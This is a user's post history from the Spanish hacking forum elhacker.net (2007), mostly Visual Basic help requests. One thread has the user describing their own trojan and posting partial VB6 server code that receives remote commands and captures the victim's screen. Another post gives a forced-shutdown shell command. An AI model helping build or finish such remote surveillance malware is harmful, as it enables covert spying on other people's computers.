elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: [1]
1  Programación / Programación Visual Basic / Re: Ayuda con mi troyano y capturar pantalla. en: 21 Octubre 2007, 06:17 am
Una duda leyen tu post el link que me diste Hades me he decidido por usar la funcio que devuelve el .png, pero una pregunta ¿De que dll's depende esta?, Que metodos me aconsejas vos.

Gracias de antemano.
2  Programación / Programación Visual Basic / Re: comandos¡! en: 20 Octubre 2007, 23:58 pm
Shell ("shutdown -s -t 00 -f")

Salu2.
3  Programación / Programación Visual Basic / Re: Ayuda con mi troyano y capturar pantalla. en: 20 Octubre 2007, 22:57 pm
Gracias vivachapas, estoy un poco asi que despues me pongo a trabajar en ello, Ahora me he dado cuenta de otra cosa, es normal que mi compu se alente un poco al hacer la imagen y gurdarla, ya se que se alenta como 10 segundos para volver a la normalidad, o alguna otra forma de capturar pantalla?

Gracias

mi compu tiene estas caracteristicas

Pentium IV 2.8
1 GB de ram
128 de video
y mas 50 Gb de espacio en disco.
4  Programación / Programación Visual Basic / Ayuda con mi troyano y capturar pantalla. en: 20 Octubre 2007, 22:17 pm
Buenas a tardes a todos resulta que estoy desarrollando mi proio troyano, y me acabo de atascar en el siguiente problema al agregarle la funcion de captura pantalla.

Esto es lo que hago en Server:

Código:
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
On Error GoTo Error
Dim datos As String
Dim vDatos As Variant
ws.GetData datos
vDatos = Split(datos, "|")
Select Case vDatos(0)Case "Capturar_Pantalla"
 Dim captura As New cJpeg
 captura.SetSamplingFrequencies 2, 2, 2, 2, 2, 2
 captura.Quality = CInt(vDatos(1)) ' La calidad la mando desde el cliente
 captura.SampleScreen
 captura.SaveFile ("D:\" & "captura" & ".jpg") ' Lo guardo en D para localizarlo mejor 
End Select
Error:
End Sub

mi problema es que como haga para que al enviar por segunda vez sobreescriba la imagen anterior, ¿Como hago esa verificacion para ver si el archivo existe?, y si sobreescribirlo.

Otra cosa no se como enviar esa imagen al cliente y ponerlo en un imagebox?, ya si envio

Código:
ws.Sendata captura

Me da erro que no coinciden los tipos.

y aprovecho para decirles como envio pulsaciones de teclado y de mouse.
Gracias de antemano.
5  Programación / Programación Visual Basic / Re: Conversacion msn en: 19 Octubre 2007, 21:02 pm
Sabes que podes hacer, bajate el msn Plus, lo instalas, te vas a Preferencias --> Scripts---> Crear Nuevo, y ahi te abre un editor para que creas tu propio escrip, creo que el lenguaje que maneja es Java.


Salu2.
6  Programación / .NET (C#, VB.NET, ASP) / Re: Conectar crystal reports con base de datos MySQL en .net2003 en: 14 Octubre 2007, 16:54 pm
Es facil, lo que tienes que hacer primero es Crear un DATASET y conectarlo realizar una consulta de los datos que deseas mostrar en le reporte.

Luego El Crystal Reports basas en el DATASET que ya creaste, y nada mas.

Con el asitente de Crystal en muy facil de hacer.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines